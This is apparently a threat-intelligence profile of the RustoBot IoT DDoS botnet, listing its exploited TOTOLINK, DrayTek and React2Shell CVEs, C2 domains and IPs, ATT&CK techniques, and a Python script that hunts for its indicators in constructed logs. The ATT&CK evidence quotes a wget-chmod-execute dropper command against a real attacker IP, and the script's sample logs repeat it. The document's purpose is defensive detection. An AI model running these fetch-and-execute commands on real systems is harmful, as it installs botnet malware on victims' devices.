Malware · Exploits 4 CVEs

Rustobot

RustoBot is a Rust-based Linux/IoT botnet used for DDoS activity. Public reporting identifies it as an ELF executable often named "bot" and describes it as primarily targeting vulnerable TOTOLINK devices, with additional exploitation of DrayTek routers also reported. Observed initial access vectors include exploitation of the TOTOLINK command-injection flaws CVE-2022-26210 and CVE-2022-26187 and the DrayTek vulnerability CVE-2024-12987, each of which enables remote code execution on affected routers. Fortinet-listed affected devices include TOTOLINK N600R, A830R, A3100R, A950RG, A800R, A3000RU, and A810R, and DrayTek Vigor2960 and Vigor300B. RustoBot supports multiple architectures including arm5, arm6, arm7, mips, mpsl, and x86, with observed payloads often targeting TOTOLINK devices via the mpsl architecture.

Its core capability is launching DDoS attacks. Reporting states it can perform UDP flood, TCP flood, and raw IP flood attacks, with tasking received from command-and-control infrastructure that specifies the method, target IP/port, duration, and packet length. Fortinet also reports that the malware uses XOR-based obfuscation and Global Offset Table manipulation to hinder reverse engineering, and that it uses DNS-over-HTTPS to determine the infected device's public IP.

The malware is associated with campaigns exploiting CVE-2025-55182 ("React2Shell") against organizations including Russian insurance, e-commerce, and IT companies, where attackers occasionally deployed RustoBot alongside XMRig, Kaiji, and Sliver. In one such case, attackers downloaded an ELF binary named "bot" from 176.117.107[.]154, which BI.ZONE identified as RustoBot. Reporting also states that RustoBot embeds XMRig as a secondary payload for monetization.

Reported command-and-control and related infrastructure includes domains ilefttotolinkalone.anondns[.]net, rustbot.anondns[.]net, bitcoinbandit.anondns[.]net, cryptoenjoyers.anondns[.]net, and dontblockme.anondns[.]net, which were reported resolving to 45.137.201[.]137 in one campaign, as well as dvrhelper[.]anondns[.]net and other C2 domains reported by Fortinet as pointing to 5.255.125[.]150. Victimology in Fortinet reporting was primarily in the technology sector across Japan, Taiwan, Vietnam, and Mexico.

For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

EXPLOITED CVES

Vulnerabilities exploited

4 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

4 CVEs
CVE-2025-55182 (React2Shell)

React2Shell in Russia: ... In some cases, the final payloads were the Kaiji and Rustobot botnets...

via Risky Biz RSS (news.risky.biz)
CVE-2022-26187: Command Injection in TOTOLINK cstecgi.cgi pingCheck (exploited in the wild)

Among the key vulnerabilities used: CVE-2022-26187 (via pingCheck)

via security online infosecurityonline.info
CVE-2022-26210: Command Injection in TOTOLINK setUpgradeFW (exploited in the wild)

FortiGuard analysts noticed a sharp uptick in attack attempts exploiting long-standing vulnerabilities in TOTOLINK’s cstecgi.cgi script... Among the key vulnerabilities used: CVE-2022-26210 (via setUpgradeFW)

via security online infosecurityonline.info
CVE-2024-12987: OS Command Injection in DrayTek Vigor2960/Vigor300B Web Management Interface (exploited in the wild)

Among the key vulnerabilities used: CVE-2024-12987 (affecting DrayTek routers through /cgi-bin/mainfunction.cgi/apmcfgupload)

via security online infosecurityonline.info
MITRE ATT&CK

Techniques & procedures

4 distinct techniques documented for this family, organized by ATT&CK tactic.

Resource Development

1 technique
T1583.006 Web Services (evidence: 1)

"...final payloads were the Kaiji and Rustobot botnets and the Sliver implant."

Execution

2 techniques
T1059.004 Unix Shell (evidence: 1)

After compromising a host via the React2Shell vulnerability, threat actors executed the following commands inside a container: /bin/sh -c 'cd /tmp; wget hxxp://176.117.107[.]154/bot; chmod 777 bot; ./bot...'

T1203 Exploitation for Client Execution (evidence: 1)

The threat actors leveraged the CVE‑2025‑55182 (React2Shell) vulnerability... Under certain conditions, this can enable an attacker to execute arbitrary code on the server.

Command and Control

1 technique
T1105 Ingress Tool Transfer (evidence: 1)

This script downloaded the XMRig cryptocurrency miner... The attackers also loaded the d5.sh Bash script onto the compromised host to download the Sliver implant... The attackers employed the check.sh Bash script to download ELF executables (a_x86 / a_x64) from a server.
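The family description above lists RustoBot's C2 domains, their resolved IPs and the download host, and the T1059.004 evidence quotes the dropper one-liner (cd /tmp; wget; chmod 777; ./bot). The following Python script is an added example, not code from the Mallory page, BI.ZONE or Fortinet: it refangs the published indicators, generalises the quoted command chain into a regex (any download tool, any payload name, the usual writable directories) and runs both checks over constructed DNS and process-execution log lines. The log formats, host names and benign lines are constructed for illustration; only the indicators and the command shape come from the page.

```python
"""Hunt for RustoBot indicators in constructed DNS and process-execution logs.

Added example. Indicators are copied from the page (kept defanged as published);
log formats, host names and every log line below are constructed.
"""
import re
from typing import Dict, List

# C2 domains and IPs as listed on the page, still defanged.
DEFANGED_DOMAINS = [
    "ilefttotolinkalone.anondns[.]net",
    "rustbot.anondns[.]net",
    "bitcoinbandit.anondns[.]net",
    "cryptoenjoyers.anondns[.]net",
    "dontblockme.anondns[.]net",
    "dvrhelper[.]anondns[.]net",
]
DEFANGED_IPS = ["45.137.201[.]137", "5.255.125[.]150", "176.117.107[.]154"]


def refang(indicator: str) -> str:
    """Turn a defanged indicator ('[.]', 'hxxp') back into its matchable form."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


DOMAINS = {refang(d) for d in DEFANGED_DOMAINS}
IPS = {refang(i) for i in DEFANGED_IPS}

# Generalisation of the quoted dropper chain "cd /tmp; wget <url>; chmod 777 bot; ./bot":
# cd into a writable directory, fetch with wget or curl, chmod, then execute the
# same file name (backreference \1). Renamed payloads and curl still match.
DROPPER_RE = re.compile(
    r"cd\s+/(?:tmp|var/tmp|dev/shm)\s*;\s*"
    r"(?:wget|curl)[^;]*;\s*"
    r"chmod\s+(?:\+x|[0-7]{3,4})\s+(\S+)\s*;\s*\./\1"
)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def classify(line: str) -> List[str]:
    """Return the sorted list of reasons a single log line matches RustoBot indicators."""
    reasons: List[str] = []
    low = line.lower()
    for dom in DOMAINS:
        if dom in low:
            reasons.append(f"c2-domain:{dom}")
    for ip in set(IPV4_RE.findall(line)):
        if ip in IPS:
            reasons.append(f"c2-ip:{ip}")
    m = DROPPER_RE.search(line)
    if m:
        reasons.append(f"dropper-chain:{m.group(1)}")
    return sorted(reasons)


def scan(lines: List[str]) -> Dict[str, List[str]]:
    """Map each matching line to its reasons; lines with no match are omitted."""
    return {ln: r for ln in lines if (r := classify(ln))}


# Constructed sample telemetry: two DNS resolver lines and three process lines.
SAMPLE_LOGS = [
    "2025-06-01T10:00:00Z dns host=router-lab-1 query=rustbot.anondns.net answer=45.137.201.137",
    "2025-06-01T10:00:05Z dns host=router-lab-1 query=updates.example.com answer=203.0.113.10",
    "2025-06-01T10:01:00Z proc host=web-1 cmd=\"/bin/sh -c 'cd /tmp; wget http://176.117.107.154/bot; chmod 777 bot; ./bot'\"",
    "2025-06-01T10:02:00Z proc host=web-2 cmd=\"sh -c 'cd /var/tmp; curl -O http://198.51.100.7/x86; chmod 777 x86; ./x86'\"",
    "2025-06-01T10:03:00Z proc host=web-2 cmd=\"chmod 755 /opt/app/run.sh\"",
]

if __name__ == "__main__":
    for line, why in scan(SAMPLE_LOGS).items():
        print(", ".join(why), "<-", line)
```

The fourth sample line matches on command shape alone even though its IP is not a published indicator, which is the point of generalising the chain: IP and domain lists age quickly, while the fetch-chmod-execute pattern in a world-writable directory is what the T1059.004 evidence actually shows. Feed real DNS and auditd/EDR command lines through `classify` in the same way; anything returning a non-empty list deserves a look.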

INDICATORS OF COMPROMISE

IOCs tracked for this family

10 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

Network
9 tracked

IPs, domains, and DNS infrastructure linked to this family.

Other
1 tracked

Other indicator types observed in public reporting.

Type     Value                     Latest sighting
ip.v4    (redacted; view in app)   5 months ago
domain   (redacted; view in app)   5 months ago
domain   (redacted; view in app)   5 months ago
ip.v4    (redacted; view in app)   5 months ago
uri      (redacted; view in app)   5 months ago
domain   (redacted; view in app)   5 months ago
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching (10)

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities (4)

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping (4)

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.